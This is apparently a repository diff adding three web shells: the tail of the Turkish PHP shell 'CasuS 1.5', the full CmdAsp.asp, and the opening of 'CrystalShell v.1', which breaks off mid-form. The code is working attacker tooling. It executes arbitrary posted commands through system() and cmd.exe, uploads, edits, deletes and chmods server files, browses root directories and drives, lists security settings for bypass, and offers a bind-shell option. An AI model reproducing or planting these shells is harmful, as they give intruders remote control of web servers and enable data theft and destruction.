+      <head>
+             <title>CasuS 1.5 by MafiABoY</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
+echo "<br>
+      <br>
+      <br>";
+echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='wshell'){
+echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
+if (isset($ok)){
+if (empty($kod)){
+die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR</font><center>");
+}
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85 readonly>";
+system("$kod");
+echo "</TEXTAREA></center>";
+exit;
+
+} elseif (empty($ok)){
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
+exit;
+}
+}
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dy)) {
+
+if(empty($dosya_gonder)){
+} else {
+copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder2)){
+} else {
+copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>y<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder3)){
+} else {
+copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder4)){
+} else {
+copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+} elseif(empty($dy )) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+}
+}
+
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardy Üzerine Yazyldy";
+                } else {
+                        $dos = "Dosya Olu?turuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açylamyyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya Ysmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Olu?turulamyyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Olu?turuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör Ysmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açylamyyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazylamyyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Ba?aryyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açylamyyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 YSYMLY DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEY?TYRYLEMEDY!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GYT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+echo "<center>------------------------------</center>";
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BYLGYLERY</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>Y?LEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu?tur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Olu?tur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<br>
+      <center>Tüm haklary sahibi MafiABoY'a aittir</center>";
+?>

php/CmdAsp.asp.php.txt

@@ -0,0 +1,55 @@
+<++ CmdAsp.asp ++>
+<%@ Language=VBScript %>
+<%
+' --------------------o0o--------------------
+' File: CmdAsp.asp
+' Author: Maceo <maceo @ dogmile.com>
+' Release: 2000-12-01
+' OS: Windows 2000, 4.0 NT
+' -------------------------------------------
+
+Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+
+On Error Resume Next
+
+' -- create the COM objects that we will be using -- '
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+' -- check for a command that we have posted -- '
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+
+' -- Use a poor man's pipe ... a temp file -- '
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+If (IsObject(oFile)) Then
+' -- Read the output from our command and remove the temp file -- '
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If
+%>
+</BODY>
+</HTML>
+<-- CmdAsp.asp -->

php/CrystalShell v.1.php

@@ -0,0 +1,929 @@
+
+<?
+
+
+
+
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+/**********************************************************/
+/*                          CrystalShell v.1
+/*                       --------- ----------
+/*
+/*       Coded by : Super-Crystal and Mohajer22
+/*    ------------------------------------------------
+/*    Arab Security Center Team <---thanks
+/*      mail : sup3r-hackers@hotmail.Com
+/* october73 shell & CrystalShell < coding by super crystal
+/*
+/*********************************************************/
+?>
+<?$dir=realpath("./")."/";
+$dir=str_replace("\\","/",$dir);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
+Crystal shell</title>
+ <style>
+   td {
+   font-family: verdana, arial, ms sans serif, sans-serif;
+   font-size: 11px;
+   color: #D5ECF9;
+   }
+   BODY {
+   margin-top: 4px;
+   margin-right: 4px;
+   margin-bottom: 4px;
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393;
+   scrollbar-3dlight-color: #000000;
+   scrollbar-darkshadow-color: #101842;
+   scrollbar-shadow-color: #ffffff;
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff;
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+	<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center">&nbsp;</p>
+	<p align="center">
+<a bookmark="minipanel">
+	<font face="Webdings" size="7" color="#DCE7EF">ö</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
+	<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span>&nbsp;&nbsp;&nbsp;&nbsp; </font>
+<font color="#FFFF00" face="Arial" size="7"><span lang="en-us">0.2</span></font></p>
+</p>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+<p align="center">
+	<b>
+	<?
+	$dirfile="$file_to_download";
+if (file_exists("$dirfile"))
+{
+header("location: $dirfile");
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+
+
+}
+
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo("<br>");
+echo "PHP version: <b>".@phpversion()."</b>";
+echo("<br>");
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<b>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+
+</p>
+	<p align="center"><font color="#FFFF00">&nbsp;</font></p>
+	<p align="center"></p>
+	</th></tr><tr>
+		<td bgcolor="#000000" style="color: #DCE7EF">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font size="4px">
+<b>
+		<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
+<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
+</font>
+</p>
+</font>
+<font size=1 face=Verdana>
+<p align="left"><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
+</b>
+	</font>
+	</font>
+	<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
+<font size=-2 face=verdana color="#FFFFFF">
+<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
+	</font>
+</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
+<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
+
+<br>&nbsp;<b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px"><font color="#FF0000" face="Verdana" size="-2">
+</font></font><font color="#FF0000" face="Verdana" size="2">
+&nbsp;</font></a><font size=2 face=verdana></a></font><font face="Verdana" size="2">&nbsp;</font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="1" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
+
+	</font></a><font face="Wingdings" size="1" color="#C0C0C0">ð</font><span lang="en-us"><font size="1" color="#C0C0C0" face="Webdings">
+</font></span><font face=Verdana color="white"><font color="#CC0000" size="1"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="ãÚáæãÇÊ ÇáÜPhp" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font><font size="1"></a></font></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="1">2</font></span><b><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1">&nbsp;</font></font><font face="verdana" color="white"><span lang="en-us"><a title="ÇáÃÏæÇÊ" href="?act=tools"><font color=#CC0000 size="1">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="1">4</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font></font>
+<font face="verdana" color="white"><span lang="en-us">
+<a title="ÇáÊÔÝíÑ" href="?act=decoder"><font color=#CC0000 size="1">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="1">i</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font>
+	</font><span lang="en-us"><font face="verdana" color="white">
+	<font color=#CC0000 size="1">
+<a title="ËÛÑÇÊ ÇáãÑæÑ" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font><font size="1"></a></font></font><font face="Webdings" size="1" color="#C0C0C0">`</font></span><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font>
+	</font><font face="verdana" color="white"><span lang="en-us">
+<a title="ÇáÅÊÕÇá ÈÞÇÚÏÉ ÇáÈíÇäÇÊ" href="?act=SQL"><font color=#CC0000 size="1">SQL</font></a></span></font></b><font face="Webdings" size="1" color="#C0C0C0">Â</font><b><font size="1" face="verdana" color="white"></a></font></b><font size="1"></font></font><b><font size=1 face=verdana>
+</font></b><font size="4px"><b>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="1">Bind</font></a></font></span></b><font face="Webdings" size="1" color="#C0C0C0">Â</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="1"> </font>
+	</font></b></font><font face="verdana" color="white">
+	<b>
+	<span lang="en-us"><font color=#CC0000 size="1">
+<a title="ÇáãÓÇÚÏÉ" href="?act=help"><font color="#CC0000">help</font></a></font></span><font size="1"></a></font></b></font><b><font size="1"></a></font><font size=1 face=verdana>
+</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="1">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="1"><a title="ÇÞÑÇÁäí" href="?act=about"><font color="#CC0000">about</font></a></font></span><font size="1"></a></font></font><font size="1"></a></font><font size=1 face=verdana>
+</font></b><span lang="en-us"><font size=1 face=Wingdings color="#C0C0C0">
+?</font></span></p>
+<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
+[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
+
+<font size="4px">
+	<font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size=-2 face=verdana color=#CC0000>server </font>
+	<font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
+	</font></a></font>
+</a></font>
+</font><b>
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
+<font size=-2 face=verdana color=white>
+	<font size="4px" face="verdana" color="white">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font face=Verdana size=-2 color="#008000">
+	CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
+	<font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
+admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
+</font>
+	</b>
+</font></a>&nbsp;&nbsp;<br>
+
+<font size="4px">
+<b>
+<font size=-2 face=verdana color=white>
+	<font face=Verdana size=-2 color="#CC0000">
+	<a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
+	<font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
+	</font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
+	</font>
+	</a>
+
+<font size="4px">
+</a>
+<font size=-2 face=verdana color=white>
+
+	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+</font></font>
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+	</font>
+	<font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
+port
+	</font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
+	</font></font>
+	</font>
+	</font>
+	</b>
+</font></p></td></tr></table>
+<?
+if ($act == "help") {echo "<center><b>ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå<br><br>ÚÒíÒí ÇáãÓÊÎÏã<br>ÇÐÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑÞ<br>æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ   </a>.</b>";}
+if ($act == "bindport"){
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Connect\"></form></div>";
+}
+if ($act == "tools"){
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+ echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
